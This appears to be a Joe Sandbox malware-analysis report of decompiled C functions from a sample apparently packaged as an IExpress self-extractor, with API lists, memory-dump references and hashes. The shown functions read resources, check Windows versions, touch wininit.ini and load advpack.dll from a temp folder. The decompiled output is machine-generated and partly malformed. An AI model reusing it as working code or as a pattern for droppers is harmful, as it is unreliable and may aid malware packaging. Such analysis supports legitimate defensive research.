                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F3A3F(void* __eflags) {
                                                				void* _t3;
                                                				void* _t9;
                                                				CHAR* _t16;
                                                
                                                				_t16 = "LICENSE";
                                                				_t1 = E002F468F(_t16, 0, 0) + 1; // 0x1
                                                				_t3 = LocalAlloc(0x40, _t1);
                                                				 *0x2f8d4c = _t3;
                                                				if(_t3 != 0) {
                                                					_t19 = _t16;
                                                					if(E002F468F(_t16, _t3, _t28) != 0) {
                                                						if(lstrcmpA( *0x2f8d4c, "<None>") == 0) {
                                                							LocalFree( *0x2f8d4c);
                                                							L9:
                                                							 *0x2f9124 = 0;
                                                							return 1;
                                                						}
                                                						_t9 = E002F6517(_t19, 0x7d1, 0, E002F3100, 0, 0);
                                                						LocalFree( *0x2f8d4c);
                                                						if(_t9 != 0) {
                                                							goto L9;
                                                						}
                                                						 *0x2f9124 = 0x800704c7;
                                                						L2:
                                                						return 0;
                                                					}
                                                					E002F44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                					LocalFree( *0x2f8d4c);
                                                					 *0x2f9124 = 0x80070714;
                                                					goto L2;
                                                				}
                                                				E002F44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                				 *0x2f9124 = E002F6285();
                                                				goto L2;
                                                			}






                                                0x002f3a46
                                                0x002f3a57
                                                0x002f3a5d
                                                0x002f3a63
                                                0x002f3a6a
                                                0x002f3a91
                                                0x002f3a9a
                                                0x002f3ad8
                                                0x002f3b13
                                                0x002f3b19
                                                0x002f3b1b
                                                0x00000000
                                                0x002f3b21
                                                0x002f3ae7
                                                0x002f3af4
                                                0x002f3afc
                                                0x00000000
                                                0x00000000
                                                0x002f3afe
                                                0x002f3a87
                                                0x00000000
                                                0x002f3a87
                                                0x002f3aa8
                                                0x002f3ab3
                                                0x002f3ab9
                                                0x00000000
                                                0x002f3ab9
                                                0x002f3a78
                                                0x002f3a82
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46A0
                                                  • Part of subcall function 002F468F: SizeofResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46A9
                                                  • Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46C3
                                                  • Part of subcall function 002F468F: LoadResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46CC
                                                  • Part of subcall function 002F468F: LockResource.KERNEL32(00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46D3
                                                  • Part of subcall function 002F468F: memcpy_s.MSVCRT ref: 002F46E5
                                                  • Part of subcall function 002F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46EF
                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,002F2F64,?,00000002,00000000), ref: 002F3A5D
                                                • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 002F3AB3
                                                  • Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
                                                  • Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554
                                                  • Part of subcall function 002F6285: GetLastError.KERNEL32(002F5BBC), ref: 002F6285
                                                • lstrcmpA.KERNEL32(<None>,00000000), ref: 002F3AD0
                                                • LocalFree.KERNEL32 ref: 002F3B13
                                                  • Part of subcall function 002F6517: FindResourceA.KERNEL32(002F0000,000007D6,00000005), ref: 002F652A
                                                  • Part of subcall function 002F6517: LoadResource.KERNEL32(002F0000,00000000,?,?,002F2EE8,00000000,002F19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 002F6538
                                                  • Part of subcall function 002F6517: DialogBoxIndirectParamA.USER32(002F0000,00000000,00000547,002F19E0,00000000), ref: 002F6557
                                                  • Part of subcall function 002F6517: FreeResource.KERNEL32(00000000,?,?,002F2EE8,00000000,002F19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 002F6560
                                                • LocalFree.KERNEL32(00000000,002F3100,00000000,00000000), ref: 002F3AF4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                • String ID: <None>$LICENSE
                                                • API String ID: 2414642746-383193767
                                                • Opcode ID: 26e6e36853591f93819da2166210e253fbb67ac4d05a4a49d01872f061b01cad
                                                • Instruction ID: 4ccaca5a67db8fd8815e7a3641608e365eefd6e9b08fc5bacdf6b92df8ecc1d1
                                                • Opcode Fuzzy Hash: 26e6e36853591f93819da2166210e253fbb67ac4d05a4a49d01872f061b01cad
                                                • Instruction Fuzzy Hash: 81118B70210105ABD724AF72BD0DF37F9A9DFD57E0B10443EB74AD51A1DEB58820CA64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E002F24E0(void* __ebx) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t7;
                                                				void* _t20;
                                                				long _t26;
                                                				signed int _t27;
                                                
                                                				_t20 = __ebx;
                                                				_t7 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t7 ^ _t27;
                                                				_t25 = 0x104;
                                                				_t26 = 0;
                                                				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                					E002F658A( &_v268, 0x104, "wininit.ini");
                                                					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                					_t25 = _lopen( &_v268, 0x40);
                                                					if(_t25 != 0xffffffff) {
                                                						_t26 = _llseek(_t25, 0, 2);
                                                						_lclose(_t25);
                                                					}
                                                				}
                                                				return E002F6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                			}











                                                0x002f24e0
                                                0x002f24eb
                                                0x002f24f2
                                                0x002f24f7
                                                0x002f2504
                                                0x002f250e
                                                0x002f251d
                                                0x002f252c
                                                0x002f2541
                                                0x002f2546
                                                0x002f2553
                                                0x002f2555
                                                0x002f2555
                                                0x002f2546
                                                0x002f256c

                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 002F2506
                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 002F252C
                                                • _lopen.KERNEL32(?,00000040), ref: 002F253B
                                                • _llseek.KERNEL32(00000000,00000000,00000002), ref: 002F254C
                                                • _lclose.KERNEL32(00000000), ref: 002F2555
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                • String ID: wininit.ini
                                                • API String ID: 3273605193-4206010578
                                                • Opcode ID: eab604fd2d127ed0199722154e85b6626b6cc1758e379480a360cb8f153011d9
                                                • Instruction ID: 0ca69341618789005ae1c2358cab479eaa415f07f21e34f2b6b2b4805d72bb96
                                                • Opcode Fuzzy Hash: eab604fd2d127ed0199722154e85b6626b6cc1758e379480a360cb8f153011d9
                                                • Instruction Fuzzy Hash: D001B971601128A7C7209B65AC0DEFFBB7CDB457E0F400179FA49D3290DE744E55CA95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E002F36EE(CHAR* __ecx) {
                                                				signed int _v8;
                                                				char _v268;
                                                				struct _OSVERSIONINFOA _v416;
                                                				signed int _v420;
                                                				signed int _v424;
                                                				CHAR* _v428;
                                                				CHAR* _v432;
                                                				signed int _v436;
                                                				CHAR* _v440;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t72;
                                                				CHAR* _t77;
                                                				CHAR* _t91;
                                                				CHAR* _t94;
                                                				int _t97;
                                                				CHAR* _t98;
                                                				signed char _t99;
                                                				CHAR* _t104;
                                                				signed short _t107;
                                                				signed int _t109;
                                                				short _t113;
                                                				void* _t114;
                                                				signed char _t115;
                                                				short _t119;
                                                				CHAR* _t123;
                                                				CHAR* _t124;
                                                				CHAR* _t129;
                                                				signed int _t131;
                                                				signed int _t132;
                                                				CHAR* _t135;
                                                				CHAR* _t138;
                                                				signed int _t139;
                                                
                                                				_t72 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t72 ^ _t139;
                                                				_v416.dwOSVersionInfoSize = 0x94;
                                                				_t115 = __ecx;
                                                				_t135 = 0;
                                                				_v432 = __ecx;
                                                				_t138 = 0;
                                                				if(GetVersionExA( &_v416) != 0) {
                                                					_t133 = _v416.dwMajorVersion;
                                                					_t119 = 2;
                                                					_t77 = _v416.dwPlatformId - 1;
                                                					__eflags = _t77;
                                                					if(_t77 == 0) {
                                                						_t119 = 0;
                                                						__eflags = 1;
                                                						 *0x2f8184 = 1;
                                                						 *0x2f8180 = 1;
                                                						L13:
                                                						 *0x2f9a40 = _t119;
                                                						L14:
                                                						__eflags =  *0x2f8a34 - _t138; // 0x0
                                                						if(__eflags != 0) {
                                                							goto L66;
                                                						}
                                                						__eflags = _t115;
                                                						if(_t115 == 0) {
                                                							goto L66;
                                                						}
                                                						_v428 = _t135;
                                                						__eflags = _t119;
                                                						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                						_t11 =  &_v420;
                                                						 *_t11 = _v420 & _t138;
                                                						__eflags =  *_t11;
                                                						_v440 = _t115;
                                                						do {
                                                							_v424 = _t135 * 0x18;
                                                							_v436 = E002F2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                							_t91 = E002F2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                							_t123 = _v436;
                                                							_t133 = 0x54d;
                                                							__eflags = _t123;
                                                							if(_t123 < 0) {
                                                								L32:
                                                								__eflags = _v420 - 1;
                                                								if(_v420 == 1) {
                                                									_t138 = 0x54c;
                                                									L36:
                                                									__eflags = _t138;
                                                									if(_t138 != 0) {
                                                										L40:
                                                										__eflags = _t138 - _t133;
                                                										if(_t138 == _t133) {
                                                											L30:
                                                											_v420 = _v420 & 0x00000000;
                                                											_t115 = 0;
                                                											_v436 = _v436 & 0x00000000;
                                                											__eflags = _t138 - _t133;
                                                											_t133 = _v432;
                                                											if(__eflags != 0) {
                                                												_t124 = _v440;
                                                											} else {
                                                												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                												_v420 =  &_v268;
                                                											}
                                                											__eflags = _t124;
                                                											if(_t124 == 0) {
                                                												_t135 = _v436;
                                                											} else {
                                                												_t99 = _t124[0x30];
                                                												_t135 = _t124[0x34] + 0x84 + _t133;
                                                												__eflags = _t99 & 0x00000001;
                                                												if((_t99 & 0x00000001) == 0) {
                                                													asm("sbb ebx, ebx");
                                                													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                												} else {
                                                													_t115 = 0x104;
                                                												}
                                                											}
                                                											__eflags =  *0x2f8a38 & 0x00000001;
                                                											if(( *0x2f8a38 & 0x00000001) != 0) {
                                                												L64:
                                                												_push(0);
                                                												_push(0x30);
                                                												_push(_v420);
                                                												_push("lega");
                                                												goto L65;
                                                											} else {
                                                												__eflags = _t135;
                                                												if(_t135 == 0) {
                                                													goto L64;
                                                												}
                                                												__eflags =  *_t135;
                                                												if( *_t135 == 0) {
                                                													goto L64;
                                                												}
                                                												MessageBeep(0);
                                                												_t94 = E002F681F(_t115);
                                                												__eflags = _t94;
                                                												if(_t94 == 0) {
                                                													L57:
                                                													0x180030 = 0x30;
                                                													L58:
                                                													_t97 = MessageBoxA(0, _t135, "lega", 0x00180030 | _t115);
                                                													__eflags = _t115 & 0x00000004;
                                                													if((_t115 & 0x00000004) == 0) {
                                                														__eflags = _t115 & 0x00000001;
                                                														if((_t115 & 0x00000001) == 0) {
                                                															goto L66;
                                                														}
                                                														__eflags = _t97 - 1;
                                                														L62:
                                                														if(__eflags == 0) {
                                                															_t138 = 0;
                                                														}
                                                														goto L66;
                                                													}
                                                													__eflags = _t97 - 6;
                                                													goto L62;
                                                												}
                                                												_t98 = E002F67C9(_t124, _t124);
                                                												__eflags = _t98;
                                                												if(_t98 == 0) {
                                                													goto L57;
                                                												}
                                                												goto L58;
                                                											}
                                                										}
                                                										__eflags = _t138 - 0x54c;
                                                										if(_t138 == 0x54c) {
                                                											goto L30;
                                                										}
                                                										__eflags = _t138;
                                                										if(_t138 == 0) {
                                                											goto L66;
                                                										}
                                                										_t135 = 0;
                                                										__eflags = 0;
                                                										goto L44;
                                                									}
                                                									L37:
                                                									_t129 = _v432;
                                                									__eflags = _t129[0x7c];
                                                									if(_t129[0x7c] == 0) {
                                                										goto L66;
                                                									}
                                                									_t133 =  &_v268;
                                                									_t104 = E002F28E8(_t129,  &_v268, _t129,  &_v428);
                                                									__eflags = _t104;
                                                									if(_t104 != 0) {
                                                										goto L66;
                                                									}
                                                									_t135 = _v428;
                                                									_t133 = 0x54d;
                                                									_t138 = 0x54d;
                                                									goto L40;
                                                								}
                                                								goto L33;
                                                							}
                                                							__eflags = _t91;
                                                							if(_t91 > 0) {
                                                								goto L32;
                                                							}
                                                							__eflags = _t123;
                                                							if(_t123 != 0) {
                                                								__eflags = _t91;
                                                								if(_t91 != 0) {
                                                									goto L37;
                                                								}
                                                								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                								L27:
                                                								if(__eflags <= 0) {
                                                									goto L37;
                                                								}
                                                								L28:
                                                								__eflags = _t135;
                                                								if(_t135 == 0) {
                                                									goto L33;
                                                								}
                                                								_t138 = 0x54c;
                                                								goto L30;
                                                							}
                                                							__eflags = _t91;
                                                							_t107 = _v416.dwBuildNumber;
                                                							if(_t91 != 0) {
                                                								_t131 = _v424;
                                                								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                									goto L37;
                                                								}
                                                								goto L28;
                                                							}
                                                							_t132 = _t107 & 0x0000ffff;
                                                							_t109 = _v424;
                                                							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                								goto L28;
                                                							}
                                                							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                							goto L27;
                                                							L33:
                                                							_t135 =  &(_t135[1]);
                                                							_v428 = _t135;
                                                							_v420 = _t135;
                                                							__eflags = _t135 - 2;
                                                						} while (_t135 < 2);
                                                						goto L36;
                                                					}
                                                					__eflags = _t77 == 1;
                                                					if(_t77 == 1) {
                                                						 *0x2f9a40 = _t119;
                                                						 *0x2f8184 = 1;
                                                						 *0x2f8180 = 1;
                                                						__eflags = _t133 - 3;
                                                						if(_t133 > 3) {
                                                							__eflags = _t133 - 5;
                                                							if(_t133 < 5) {
                                                								goto L14;
                                                							}
                                                							_t113 = 3;
                                                							_t119 = _t113;
                                                							goto L13;
                                                						}
                                                						_t119 = 1;
                                                						_t114 = 3;
                                                						 *0x2f9a40 = 1;
                                                						__eflags = _t133 - _t114;
                                                						if(__eflags < 0) {
                                                							L9:
                                                							 *0x2f8184 = _t135;
                                                							 *0x2f8180 = _t135;
                                                							goto L14;
                                                						}
                                                						if(__eflags != 0) {
                                                							goto L14;
                                                						}
                                                						__eflags = _v416.dwMinorVersion - 0x33;
                                                						if(_v416.dwMinorVersion >= 0x33) {
                                                							goto L14;
                                                						}
                                                						goto L9;
                                                					}
                                                					_t138 = 0x4ca;
                                                					goto L44;
                                                				} else {
                                                					_t138 = 0x4b4;
                                                					L44:
                                                					_push(_t135);
                                                					_push(0x10);
                                                					_push(_t135);
                                                					_push(_t135);
                                                					L65:
                                                					_t133 = _t138;
                                                					E002F44B9(0, _t138);
                                                					L66:
                                                					return E002F6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                				}
                                                			}





































                                                0x002f36f9
                                                0x002f3700
                                                0x002f370c
                                                0x002f3716
                                                0x002f3718
                                                0x002f371b
                                                0x002f3721
                                                0x002f372b
                                                0x002f373d
                                                0x002f3745
                                                0x002f3746
                                                0x002f3746
                                                0x002f3749
                                                0x002f37ab
                                                0x002f37ad
                                                0x002f37ae
                                                0x002f37b3
                                                0x002f37b8
                                                0x002f37b8
                                                0x002f37bf
                                                0x002f37bf
                                                0x002f37c5
                                                0x00000000
                                                0x00000000
                                                0x002f37cb
                                                0x002f37cd
                                                0x00000000
                                                0x00000000
                                                0x002f37d5
                                                0x002f37db
                                                0x002f37e8
                                                0x002f37ea
                                                0x002f37ea
                                                0x002f37ea
                                                0x002f37f0
                                                0x002f37f6
                                                0x002f3805
                                                0x002f3817
                                                0x002f382b
                                                0x002f3830
                                                0x002f3836
                                                0x002f383b
                                                0x002f383d
                                                0x002f38eb
                                                0x002f38eb
                                                0x002f38f2
                                                0x002f390c
                                                0x002f3911
                                                0x002f3911
                                                0x002f3913
                                                0x002f394d
                                                0x002f394d
                                                0x002f394f
                                                0x002f38a9
                                                0x002f38a9
                                                0x002f38b0
                                                0x002f38b2
                                                0x002f38b9
                                                0x002f38bb
                                                0x002f38c1
                                                0x002f3975
                                                0x002f38c7
                                                0x002f38de
                                                0x002f38e0
                                                0x002f38e0
                                                0x002f397b
                                                0x002f397d
                                                0x002f39a9
                                                0x002f397f
                                                0x002f3982
                                                0x002f398b
                                                0x002f398d
                                                0x002f398f
                                                0x002f399f
                                                0x002f39a1
                                                0x002f3991
                                                0x002f3991
                                                0x002f3991
                                                0x002f398f
                                                0x002f39af
                                                0x002f39b6
                                                0x002f3a0f
                                                0x002f3a0f
                                                0x002f3a11
                                                0x002f3a13
                                                0x002f3a19
                                                0x00000000
                                                0x002f39b8
                                                0x002f39b8
                                                0x002f39ba
                                                0x00000000
                                                0x00000000
                                                0x002f39bc
                                                0x002f39bf
                                                0x00000000
                                                0x00000000
                                                0x002f39c3
                                                0x002f39c9
                                                0x002f39ce
                                                0x002f39d0
                                                0x002f39e3
                                                0x002f39e5
                                                0x002f39e6
                                                0x002f39f1
                                                0x002f39f7
                                                0x002f39fa
                                                0x002f3a01
                                                0x002f3a04
                                                0x00000000
                                                0x00000000
                                                0x002f3a06
                                                0x002f3a09
                                                0x002f3a09
                                                0x002f3a0b
                                                0x002f3a0b
                                                0x00000000
                                                0x002f3a09
                                                0x002f39fc
                                                0x00000000
                                                0x002f39fc
                                                0x002f39d3
                                                0x002f39d8
                                                0x002f39da
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f39dc
                                                0x002f39b6
                                                0x002f3955
                                                0x002f395b
                                                0x00000000
                                                0x00000000
                                                0x002f3961
                                                0x002f3963
                                                0x00000000
                                                0x00000000
                                                0x002f3969
                                                0x002f3969
                                                0x00000000
                                                0x002f3969
                                                0x002f3915
                                                0x002f3915
                                                0x002f391b
                                                0x002f391f
                                                0x00000000
                                                0x00000000
                                                0x002f392d
                                                0x002f3933
                                                0x002f3938
                                                0x002f393a
                                                0x00000000
                                                0x00000000
                                                0x002f3940
                                                0x002f3946
                                                0x002f394b
                                                0x00000000
                                                0x002f394b
                                                0x00000000
                                                0x002f38f2
                                                0x002f3843
                                                0x002f3845
                                                0x00000000
                                                0x00000000
                                                0x002f384b
                                                0x002f384d
                                                0x002f3883
                                                0x002f3885
                                                0x00000000
                                                0x00000000
                                                0x002f389a
                                                0x002f389e
                                                0x002f389e
                                                0x00000000
                                                0x00000000
                                                0x002f38a0
                                                0x002f38a0
                                                0x002f38a2
                                                0x00000000
                                                0x00000000
                                                0x002f38a4
                                                0x00000000
                                                0x002f38a4
                                                0x002f384f
                                                0x002f3851
                                                0x002f3857
                                                0x002f386e
                                                0x002f3877
                                                0x002f387b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f3881
                                                0x002f3859
                                                0x002f385c
                                                0x002f3862
                                                0x002f3866
                                                0x00000000
                                                0x00000000
                                                0x002f3868
                                                0x00000000
                                                0x002f38f4
                                                0x002f38f4
                                                0x002f38f5
                                                0x002f38fb
                                                0x002f3901
                                                0x002f3901
                                                0x00000000
                                                0x002f390a
                                                0x002f374b
                                                0x002f374e
                                                0x002f375c
                                                0x002f3764
                                                0x002f3769
                                                0x002f376e
                                                0x002f3771
                                                0x002f379c
                                                0x002f379f
                                                0x00000000
                                                0x00000000
                                                0x002f37a3
                                                0x002f37a4
                                                0x00000000
                                                0x002f37a4
                                                0x002f3773
                                                0x002f3777
                                                0x002f3778
                                                0x002f377f
                                                0x002f3781
                                                0x002f378e
                                                0x002f378e
                                                0x002f3794
                                                0x00000000
                                                0x002f3794
                                                0x002f3783
                                                0x00000000
                                                0x00000000
                                                0x002f3785
                                                0x002f378c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f378c
                                                0x002f3750
                                                0x00000000
                                                0x002f372d
                                                0x002f372d
                                                0x002f396b
                                                0x002f396b
                                                0x002f396c
                                                0x002f396e
                                                0x002f396f
                                                0x002f3a1e
                                                0x002f3a1e
                                                0x002f3a22
                                                0x002f3a27
                                                0x002f3a3e
                                                0x002f3a3e

                                                APIs
                                                • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 002F3723
                                                • MessageBeep.USER32(00000000), ref: 002F39C3
                                                • MessageBoxA.USER32(00000000,00000000,lega,00000030), ref: 002F39F1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Message$BeepVersion
                                                • String ID: 3$lega
                                                • API String ID: 2519184315-680046778
                                                • Opcode ID: e5472f7a5c26b02173a97e1358d47b9c0d9a2e3c787ed9b39fb19f49e15b1dc2
                                                • Instruction ID: e708ac7de1738cd266fc3fa439e89d2c5cdc11d8dbed016d83d5f49f5db1da29
                                                • Opcode Fuzzy Hash: e5472f7a5c26b02173a97e1358d47b9c0d9a2e3c787ed9b39fb19f49e15b1dc2
                                                • Instruction Fuzzy Hash: 7791E1B1A2121D9BEB34DE25CD84BBAF3A0AB453D0F1501B9DA89D7251D7B08FA0CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E002F6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
                                                				struct HRSRC__* _t6;
                                                				void* _t21;
                                                				struct HINSTANCE__* _t23;
                                                				int _t24;
                                                
                                                				_t23 =  *0x2f9a3c; // 0x2f0000
                                                				_t6 = FindResourceA(_t23, __edx, 5);
                                                				if(_t6 == 0) {
                                                					L6:
                                                					E002F44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                					_t5 =  &_a16; // 0x2f2ee8
                                                					_t24 =  *_t5;
                                                				} else {
                                                					_t21 = LoadResource(_t23, _t6);
                                                					if(_t21 == 0) {
                                                						goto L6;
                                                					} else {
                                                						if(_a12 != 0) {
                                                							_push(_a12);
                                                						} else {
                                                							_push(0);
                                                						}
                                                						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                						FreeResource(_t21);
                                                						if(_t24 == 0xffffffff) {
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t24;
                                                			}







                                                0x002f651f
                                                0x002f652a
                                                0x002f6534
                                                0x002f656b
                                                0x002f6577
                                                0x002f657c
                                                0x002f657c
                                                0x002f6536
                                                0x002f653e
                                                0x002f6542
                                                0x00000000
                                                0x002f6544
                                                0x002f6547
                                                0x002f654c
                                                0x002f6549
                                                0x002f6549
                                                0x002f6549
                                                0x002f655e
                                                0x002f6560
                                                0x002f6569
                                                0x00000000
                                                0x00000000
                                                0x002f6569
                                                0x002f6542
                                                0x002f6587

                                                APIs
                                                • FindResourceA.KERNEL32(002F0000,000007D6,00000005), ref: 002F652A
                                                • LoadResource.KERNEL32(002F0000,00000000,?,?,002F2EE8,00000000,002F19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 002F6538
                                                • DialogBoxIndirectParamA.USER32(002F0000,00000000,00000547,002F19E0,00000000), ref: 002F6557
                                                • FreeResource.KERNEL32(00000000,?,?,002F2EE8,00000000,002F19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 002F6560
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                • String ID: ./
                                                • API String ID: 1214682469-1156030697
                                                • Opcode ID: 0f6b562781fac4fdadc22f3c626cadb9b07c98ab6e888c57d369344af408cea7
                                                • Instruction ID: 969ef348828a811c721b778ca94d5f535f6079a93fa9f257d5e980960dffc2cf
                                                • Opcode Fuzzy Hash: 0f6b562781fac4fdadc22f3c626cadb9b07c98ab6e888c57d369344af408cea7
                                                • Instruction Fuzzy Hash: 140184B211051ABBDB105E59AC4CEBBB66CEB857F1B410139FA14A3150D6719D20CAA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E002F6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __edi;
                                                				signed int _t9;
                                                				signed char _t14;
                                                				struct HINSTANCE__* _t15;
                                                				void* _t18;
                                                				CHAR* _t26;
                                                				void* _t27;
                                                				signed int _t28;
                                                
                                                				_t27 = __esi;
                                                				_t18 = __ebx;
                                                				_t9 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t9 ^ _t28;
                                                				_push(__ecx);
                                                				E002F1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                				_t26 = "advpack.dll";
                                                				E002F658A( &_v268, 0x104, _t26);
                                                				_t14 = GetFileAttributesA( &_v268);
                                                				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                					_t15 = LoadLibraryA(_t26);
                                                				} else {
                                                					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                				}
                                                				return E002F6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                			}













                                                0x002f6495
                                                0x002f6495
                                                0x002f64a0
                                                0x002f64a7
                                                0x002f64ab
                                                0x002f64bd
                                                0x002f64c2
                                                0x002f64d3
                                                0x002f64df
                                                0x002f64e8
                                                0x002f6502
                                                0x002f64ee
                                                0x002f64f9
                                                0x002f64f9
                                                0x002f6516

                                                APIs
                                                • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 002F64DF
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 002F64F9
